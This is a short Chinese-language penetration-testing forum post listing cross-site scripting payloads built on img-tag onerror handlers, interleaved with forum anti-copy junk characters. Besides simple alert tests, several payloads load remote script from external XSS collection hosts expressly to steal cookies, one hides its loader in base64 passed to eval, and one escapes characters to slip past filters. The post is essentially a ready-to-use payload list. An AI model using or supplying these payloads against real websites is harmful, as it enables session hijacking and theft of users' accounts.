中国网络渗透测试联盟

标题: img标签的常用几种测试手段 [打印本页]

---

作者: admin    时间: 2015-10-18 14:33
标题: img标签的常用几种测试手段
<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
& q' l5 A; W/ a7 _<img src=# onerror=alert(document.cookie)>
& Z( d* L% ?3 B& V9 I  `- e2 }% F下面是利用平台钓cookie的
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
* q+ n  f& o/ i2 C7 T( Y5 @4 z- v
( C/ v2 l. c& I& T4 G4 s$ m  a
8 W: c! B0 n6 B2 y  |3 `/ f  K2 X& T<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
4 h0 D' l, z. j$ F. p6 ~7 {( B<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
0 S, n: p+ Y- n8 l- w$ ^* U$ l“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
4 @# N* A% @/ N( d$ X$ ]<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
( n  X% f7 h# f  E$ H. I<img src="#">
4 c2 ?" r8 W# l3 K<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
1 x# J0 c2 q5 l& o$ N0 O7 B3 @<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
: I+ I# P. |* g7 d7 s2 X2 _  |<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
1 o6 @; |9 t% X0 H' ~$ p<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
3 W( F- v4 f; E- i, M

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2